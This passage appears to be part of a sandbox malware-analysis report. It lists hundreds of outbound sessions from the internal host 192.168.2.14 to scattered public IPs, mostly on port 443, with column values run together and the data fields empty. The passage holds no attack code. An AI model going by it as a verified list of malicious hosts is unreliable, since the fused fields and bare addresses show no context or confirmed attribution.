                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13661192.168.2.1452556205.103.93.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13662192.168.2.1457646133.68.123.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13663192.168.2.143819431.12.195.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13664192.168.2.145004084.177.177.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13665192.168.2.1448962131.185.166.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13666192.168.2.1439216186.141.38.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13667192.168.2.1451050116.179.40.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13668192.168.2.1435384176.252.145.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13669192.168.2.1443950182.109.31.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13670192.168.2.1453998179.61.209.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13671192.168.2.1442140116.115.37.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13672192.168.2.144182095.49.38.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13673192.168.2.1445862185.105.89.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13674192.168.2.1454660110.42.205.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13675192.168.2.1438094100.10.156.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13676192.168.2.143985450.193.97.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13677192.168.2.145571627.66.208.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13678192.168.2.144767251.63.242.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13679192.168.2.1452136198.50.185.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13680192.168.2.1459260159.160.25.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13681192.168.2.1445540121.47.183.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13682192.168.2.143567089.151.146.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13683192.168.2.1436090197.171.51.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13684192.168.2.1456210128.43.59.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13685192.168.2.143380475.198.195.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13686192.168.2.146098218.116.131.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13687192.168.2.1444814135.111.83.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13688192.168.2.1457342149.196.188.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13689192.168.2.1458504120.56.48.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13690192.168.2.1453406106.2.167.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13691192.168.2.145978675.22.162.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13692192.168.2.1437760184.44.96.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13693192.168.2.143366666.169.129.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13694192.168.2.1450892211.125.113.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13695192.168.2.1455556132.204.108.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13696192.168.2.1435278101.229.214.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13697192.168.2.145955859.198.34.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13698192.168.2.143403859.34.19.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13699192.168.2.1454624145.148.44.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13700192.168.2.145808637.118.241.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13701192.168.2.1455240140.227.84.1078080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13702192.168.2.144979231.211.145.1888080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13703192.168.2.145105827.34.146.1758080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13704192.168.2.145938492.38.70.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13705192.168.2.144105886.81.65.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13706192.168.2.1459430185.80.34.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13707192.168.2.1434364201.162.213.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13708192.168.2.1448626156.4.40.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13709192.168.2.143664219.114.178.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13710192.168.2.14344961.42.9.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13711192.168.2.143862270.162.34.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13712192.168.2.144257247.119.93.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13713192.168.2.1456608134.59.12.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13714192.168.2.1455258204.249.107.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13715192.168.2.1441726199.84.116.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13716192.168.2.1443352118.116.131.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13717192.168.2.1458462201.238.124.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13718192.168.2.1435200147.127.238.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13719192.168.2.1460636202.222.152.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13720192.168.2.1449318161.167.236.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13721192.168.2.1454592185.136.181.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13722192.168.2.145503263.146.97.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13723192.168.2.145716879.194.20.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13724192.168.2.144939259.221.135.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13725192.168.2.1442704156.53.246.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13726192.168.2.145188242.60.5.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13727192.168.2.144799452.128.75.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13728192.168.2.1444054169.50.29.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13729192.168.2.1452434118.170.66.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13730192.168.2.1450332131.52.44.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13731192.168.2.143824861.219.89.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13732192.168.2.1453384184.36.52.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13733192.168.2.143769278.167.41.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13734192.168.2.1434802221.126.63.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13735192.168.2.1447426110.254.34.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13736192.168.2.143955073.52.120.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13737192.168.2.1453008187.234.37.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13738192.168.2.1442834110.5.152.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13739192.168.2.144059841.82.37.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13740192.168.2.145034476.111.8.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13741192.168.2.144712478.32.47.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13742192.168.2.143881458.48.226.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13743192.168.2.1454352158.113.97.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13744192.168.2.1458162140.124.179.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13745192.168.2.143886425.93.126.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13746192.168.2.145566081.130.171.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13747192.168.2.1445406213.160.45.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13748192.168.2.1433890147.235.242.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13749192.168.2.143995417.15.116.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13750192.168.2.1449022175.72.7.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13751192.168.2.1460030130.239.203.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13752192.168.2.1439326221.102.200.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13753192.168.2.144081239.123.29.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13754192.168.2.143278043.69.136.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13755192.168.2.1443438101.135.146.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13756192.168.2.1452086163.158.4.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13757192.168.2.143407453.17.132.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13758192.168.2.1445974144.80.182.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13759192.168.2.143615843.235.98.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13760192.168.2.144261835.59.113.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13761192.168.2.1448754189.214.138.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13762192.168.2.1439288106.168.89.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13763192.168.2.144116871.204.22.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13764192.168.2.146067424.236.152.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13765192.168.2.144829674.153.117.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13766192.168.2.1458452111.113.200.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13767192.168.2.1432784205.211.203.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13768192.168.2.1433510146.98.231.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13769192.168.2.145552853.165.211.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13770192.168.2.1458288185.133.192.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13771192.168.2.145014872.9.34.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13772192.168.2.1433230129.143.168.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13773192.168.2.143393275.222.178.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13774192.168.2.1443440150.125.10.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13775192.168.2.1436982144.159.205.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13776192.168.2.1440934210.106.144.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13777192.168.2.145109849.141.44.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13778192.168.2.144841846.47.53.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13779192.168.2.144015851.245.238.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13780192.168.2.1440728170.128.214.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13781192.168.2.145309487.112.239.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13782192.168.2.145220444.222.251.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13783192.168.2.1452622219.125.158.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13784192.168.2.1452522203.33.194.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13785192.168.2.144882872.215.190.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13786192.168.2.1450888186.34.119.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13787192.168.2.144747449.217.171.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13788192.168.2.144201262.254.252.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13789192.168.2.1441784136.147.87.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13790192.168.2.1443360185.131.52.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13791192.168.2.143704623.180.246.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13792192.168.2.144932092.59.169.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13793192.168.2.145141277.148.13.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13794192.168.2.1449566115.150.201.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13795192.168.2.14402725.228.168.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13796192.168.2.14360241.198.0.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13797192.168.2.1446728147.240.28.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13798192.168.2.1435158196.142.9.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13799192.168.2.1460164178.41.170.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13800192.168.2.145205445.209.142.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13801192.168.2.1441220197.64.36.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13802192.168.2.143595694.221.204.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13803192.168.2.143369647.35.212.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13804192.168.2.1459264185.86.43.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13805192.168.2.1442216150.226.159.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13806192.168.2.1441400117.100.17.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13807192.168.2.1452282219.195.26.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13808192.168.2.1441028192.116.183.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13809192.168.2.1452714130.217.199.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13810192.168.2.144243045.99.204.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13811192.168.2.143431439.162.30.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13812192.168.2.1440638181.48.75.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13813192.168.2.143392257.245.228.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13814192.168.2.1442888137.241.222.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13815192.168.2.1458332160.219.155.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13816192.168.2.143505884.76.129.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13817192.168.2.1440314118.242.147.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13818192.168.2.14469264.124.159.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13819192.168.2.143421080.160.128.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13820192.168.2.1443276131.140.87.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13821192.168.2.1442436202.120.5.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13822192.168.2.145298414.148.33.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13823192.168.2.1443662104.75.77.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13824192.168.2.1456338211.138.176.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13825192.168.2.144160225.99.69.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13826192.168.2.1459126172.241.6.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13827192.168.2.1434220204.137.20.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13828192.168.2.1457484112.207.129.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13829192.168.2.1435508110.163.203.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13830192.168.2.1442356166.204.62.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13831192.168.2.1433340131.197.46.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13832192.168.2.143285846.4.6.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13833192.168.2.145798235.198.137.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13834192.168.2.1447236191.20.40.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13835192.168.2.1448160173.16.200.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13836192.168.2.144529284.152.54.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13837192.168.2.145893244.1.222.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13838192.168.2.1434372192.91.171.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13839192.168.2.145659486.205.226.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13840192.168.2.1440906136.33.196.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13841192.168.2.1438882154.4.167.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13842192.168.2.1437512176.232.131.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13843192.168.2.1441916153.107.110.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13844192.168.2.145480471.15.215.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13845192.168.2.1436628207.107.24.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13846192.168.2.145001890.66.178.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13847192.168.2.144748665.54.189.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13848192.168.2.1446542109.156.74.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13849192.168.2.1440932178.52.122.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13850192.168.2.1460844218.152.8.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13851192.168.2.1460542124.192.89.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13852192.168.2.1447118161.218.132.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13853192.168.2.1441306106.255.73.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13854192.168.2.1439770157.55.41.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13855192.168.2.1437100184.104.196.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13856192.168.2.1447132128.69.102.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13857192.168.2.143624219.2.33.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13858192.168.2.1439592120.130.80.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13859192.168.2.1450700126.68.214.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13860192.168.2.14339348.151.173.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13861192.168.2.1445616192.244.250.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13862192.168.2.144306267.208.242.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13863192.168.2.1443412120.13.155.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13864192.168.2.1440002180.42.118.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13865192.168.2.1448938126.243.198.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13866192.168.2.143798084.228.29.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13867192.168.2.145315284.245.129.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13868192.168.2.145088049.218.161.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13869192.168.2.1456606167.227.111.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13870192.168.2.1440792109.41.244.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13871192.168.2.1453808182.226.166.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13872192.168.2.144216831.229.126.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
